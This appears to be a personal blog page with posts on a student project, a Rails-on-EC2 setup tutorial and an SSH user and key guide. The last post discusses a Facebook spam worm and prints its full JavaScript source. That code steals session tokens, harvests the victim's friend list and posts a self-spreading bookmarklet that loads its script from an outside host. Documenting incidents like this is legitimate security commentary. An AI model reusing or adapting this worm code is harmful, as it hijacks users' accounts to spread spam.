.
Check out the cs181 final project that we just made. It’s a text based adventure game, with a little console in the browser where you can explore some history and cases relating to press freedom for bloggers.
project by me, Eric Conner, and Zach Galant.
Browse the code on github
I will try and go through how I set up Ruby on Rails on a new ec2 instance. I will include in my explanation the errors I faced along the way and how I solved them in the hope that showing the wrong way and then the right way is more helpful than just the right way.
Ok.
Change the permissions on your key and use it to ssh into your ec2 instance.
$ chmod 600 mykey.pem $ ssh -i mykey.pem root@####.uswest-1.compute.amazonaws.com
$ cat /etc/*-release
To find your system information
Let’s start of by installing ruby.
$ sudo apt-get install ruby
$ ruby -v
Next we'll get ruby gems.
wget http://production.cf.rubygems.org/rubygems/rubygems-1.7.2.tgz tar xzf rubygems-1.7.2.tgz cd rubygems-1.7.2/ sudo ruby setup.rb RubyGems installed the following executables: /usr/bin/gem1.8
Let's see if we can check what version of ruby gems we have.
$ gem -v The program 'gem' is currently not installed.
$ gem1.8 -v 1.7.2
We need a symlink
$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem $ gem -v 1.7.2
Now let's install rails.
$ sudo gem update --system $ sudo gem install rails $ rails --version Rails 3.0.7
Now the mysql server, if you want to use it later.
$ sudo apt-get install mysql-server
Us this to access the mysql server. -p will prompt you for the password
$ mysql -uroot -p
Install git
$ sudo apt-get install git-core
Install apache
$ sudo aptitude install apache2
Now I'm going to make a small change to the configuration so you can see something on the web.
$ cd /etc/apache2 $ sudo vim apache2.conf
uncomment this line
ServerRoot "/etc/apache2"
Restart the server
$ sudo /etc/init.d/apache2 restart
Now visit your website!
http://ec2-#####.us-west-1.compute.amazonaws.com/
There should be something there, probably the basic apache starter page.
Now I'm going to try and install a rails app.
$ cd /var/www
$ sudo find . -exec chown ubuntu {} ;
Here I changed to the directory where I will have my website files, and changed the ubuntu user (which I was logged in as) to get owner permissions here instead of root.
$ rails new blog $ cd blog $ bundle install
Errors!
/usr/bin/ruby1.8 extconf.rb
extconf.rb:3:in `require': no such file to load -- mkmf (LoadError)
from extconf.rb:3
Solution:
$ sudo apt-get install ruby-dev
Now try again. This was what I eventually did to get it to work. It's possible you just may need to run "sudo bundle install." But we'll never know. Especially since every server configuration is very different.
$ bundle install $ sudo apt-get install libsqlite3-dev $ sudo apt-get install make $ sudo gem install sqlite3-ruby --version=1.2.5 $ sudo gem install sqlite3 $ bundle install
Now I want to see if I can see the basic rails site from webrick default rails server.
$ rails server
visit
http://ec2-#####.us-west-1.compute.amazonaws.com:3000
Rails is installed. You really would set up a production server using mod_rails, but this is a first step!
Based on an article from: http://blog.taggesell.de/index.php?/archives/73-Managing-Amazon-EC2-SSH-login-and-protecting-your-instances.html
After you have created your instance:
Save the Public DNS, it looks something like ec2-########-compute.amazonaws.com
After you have your keypair, run this command
$ ssh -i mykeypair.pem ubuntu@ec2-##########.compute-1.amazonaws.com
You should be in now. Cool.
Now set yourself up your own user account.
adduser jkeesh
Adduser is the one you want, that sets up with proper options. The first time I wrote this I used useradd.
(old version)
$ sudo useradd -m jkeesh
-m creates a home directory for the user
$ sudo passwd jkeesh
(end old version)
But you’re cool. You can be root to.
$ sudo visudo
under the line
root ALL=(ALL) ALL
add yourself
jkeesh ALL=(ALL) ALL
Just to show you that you can, enable password authentication
$ sudo vim /etc/ssh/sshd_config
and write (or uncomment)
PasswordAuthentication yes
Now reload that ssh configuration
$ sudo /etc/init.d/ssh reload
Now try logging out and logging back in with your new username, just to see that it worked.
$ ssh jkeesh@ec2-#######-compute.amazonaws.com
And run some sudo command to see that it worked too.
$ sudo your-favorite-command-that-you-can-only-do-with-special-privileges
Now make well set up the public/private key so you can get rid of this password authentication nonsense.
If you have a public key called id_rsa.pub use scp to get it onto the server:
local$ scp ~/.ssh/id_rsa.pub jkeesh@ec2-#####.compute-1.amazonaws.com:/home/jkeesh
Now we will put it in the right place. You should be adding this key to the user’s authorized_keys file, but we don’t have that file yet, so we’ll just move it and set permissions.
$ mkdir .ssh $ mv id_rsa.pub .ssh/authorized_keys $ chmod 700 .ssh $ chmod 600 .ssh/authorized_keys
Now you should be able to log in to your server without a password. Try it:
$ ssh jkeesh@ec2-#######.compute-1.amazonaws.com
At this point, if you are in, we can disable password authentication. We will also disable root login, for security.
$ sudo vim /etc/ssh/sshd_config
Find the lines for PasswordAuthentication and PermitRootLogin and change to no.
PasswordAuthentication no .. PermitRootLogin no $ sudo /etc/init.d/ssh reload
Thats a little bit for now on creating user accounts, changing ssh settings, and setting up public keys.
So I saw a post on my wall from a friend, but something just didn’t sound right. Again, it was a case of the Facebook spam that somehow tricked you into posting something you didn’t want to post to all of your friends. And many people made the mistake, and it spread fast.
Mainly, it is impressive that these Facebook hackers were able to come up with this. It shows you how difficult of a problem security is for a big company like Facebook.
The hack was that they made a link which appeared to be from Facebook say “Remove this App” right next to common actions like “Like” or “Comment.” But this link was a link to a malicious piece of javascript which got a file from Dropbox and copied this post onto the walls of your friends.
I went to look at the file… which was here, http://dl.dropbox.com/u/10505629/verify.js. But then I went back and Dropbox had apparently taken it down about two minutes later. A fast response–but this message had probably already been replicated, idk, a hundred thousand times?
It seems to have been low damage, but it raises interesting security questions when people believe so readily the information that comes from their friends’ Facebook accounts. I just heard yesterday a case where a friend’s mom’s account had sent out a message about needing help and wiring money–and people fell for it.
I’m posting the js code below, since it is now not accessible — but with the swearing removed.
==== verify.js ======
var message = "-------------------- I hate you and the only way to remove all these posts is by disabling this below.";
var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
var myText = "Remove This App";
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0 ; i < friends.length ; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){
}
}
httpwp.send(paramswp);
}
alert("Failed to remove. ----------");
document.location = "";